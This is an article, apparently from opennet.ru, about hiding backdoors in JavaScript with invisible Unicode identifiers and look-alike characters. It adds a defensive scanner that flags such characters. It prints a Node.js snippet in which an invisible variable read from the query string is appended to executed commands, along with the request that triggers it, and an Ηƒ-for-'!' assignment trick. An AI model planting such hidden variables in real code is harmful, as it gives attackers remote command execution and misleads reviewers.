Using invisible unicode characters to hide actions in JavaScript code

Following the Trojan Source attack method, which relies on Unicode characters that change the display order of bidirectional text, another technique for introducing hidden actions has been published, this one applicable to JavaScript code. The new method is based on the Unicode character "γ…€" (code point 0x3164, "HANGUL FILLER"), which is classified as a letter but has no visible glyph. The Unicode category this character belongs to has been permitted in JavaScript variable names since the ECMAScript 2015 specification, which makes it possible to create invisible variables, or new variables indistinguishable from existing ones, in popular code editors such as Notepad++ and VS Code.

As an example, code for the Node.js platform is given in which a backdoor, hidden behind a variable consisting of the single character "γ…€", allows code specified by the attacker to be executed:

    app.get('/network_health', async (req, res) => {
        const { timeout,γ…€} = req.query;          // actually says "const { timeout,\u3164}"
        const checkCommands = [
            'ping -c 1 google.com',
            'curl -s http://example.com/',γ…€       // comma followed by \u3164
        ];

At first glance, only the timeout value is taken from the request parameters, and the array of commands to be executed contains a harmless fixed list. In fact, after the timeout variable, a second, invisible variable named with the character \u3164 is also destructured from the query, and its value is then appended to the array of executable commands. With such a structure in place, an attacker can send a request like "https://host:8080/network_health?%E3%85%A4=command" to activate the backdoor and execute code of their choosing.

As another example, the character "Ηƒ" (ALVEOLAR CLICK) is given, which can be used to give the appearance of an exclamation mark. For example, the expression "if(environmentΗƒ=ENV_PROD){", when executed in Node.js 14, will always be true, because it does not perform an inequality check ("!=") but instead assigns ENV_PROD to the variable "environmentΗƒ". Other misleading Unicode characters include "/", "βˆ’", "οΌ‹", "β©΅", "❨", "β«½", "κ“Ώ", and "βˆ—".
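A defender-side check for both tricks described above, added here as an example and not taken from the original article: it tokenizes JavaScript source into identifiers and reports any identifier character that is invisible (Unicode Default_Ignorable, such as U+3164) or otherwise non-ASCII, so that a review or pre-commit hook can flag it. The table of confusable code points and the sample source are constructed for this example.

```javascript
// Added example: flag identifiers that contain invisible or confusable
// Unicode characters. SUSPICIOUS is a small hand-picked table (an assumption
// for this example, not a complete list); anything else non-ASCII in an
// identifier is still reported, just with a generic reason.
const SUSPICIOUS = new Map([
  [0x3164, 'HANGUL FILLER (invisible)'],
  [0x115f, 'HANGUL CHOSEONG FILLER (invisible)'],
  [0x1160, 'HANGUL JUNGSEONG FILLER (invisible)'],
  [0xffa0, 'HALFWIDTH HANGUL FILLER (invisible)'],
  [0x01c3, 'click letter resembling "!"'],
  [0x2212, 'MINUS SIGN resembling "-"'],
  [0x2215, 'DIVISION SLASH resembling "/"'],
]);

// JavaScript identifier shape: ID_Start then ID_Continue (plus $, _, ZWNJ, ZWJ).
const IDENT = /[\p{ID_Start}$_][\p{ID_Continue}$\u200c\u200d]*/gu;
const IGNORABLE = /\p{Default_Ignorable_Code_Point}/u;

// Returns one finding per (line, identifier, non-ASCII code point).
function scanSource(source) {
  const findings = [];
  source.split('\n').forEach((text, i) => {
    for (const m of text.matchAll(IDENT)) {
      for (const ch of m[0]) {
        const cp = ch.codePointAt(0);
        if (cp < 0x80) continue; // plain ASCII identifier character
        const reason = SUSPICIOUS.get(cp)
          || (IGNORABLE.test(ch) ? 'default-ignorable (renders as nothing)'
                                 : 'non-ASCII identifier character');
        findings.push({
          line: i + 1,
          identifier: m[0],
          codePoint: 'U+' + cp.toString(16).toUpperCase().padStart(4, '0'),
          reason,
        });
      }
    }
  });
  return findings;
}

// Constructed sample mirroring the two patterns from the article.
const SAMPLE = [
  'const { timeout,\u3164} = req.query;',
  "const checkCommands = ['ping -c 1 google.com',\u3164];",
  'if (environment\u01C3=ENV_PROD) { deploy(); }',
  'const caf\u00E9 = 1;',
].join('\n');

for (const f of scanSource(SAMPLE)) {
  console.log(`line ${f.line}: ${f.codePoint} in "${f.identifier}" - ${f.reason}`);
}
```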

Source: opennet.ru
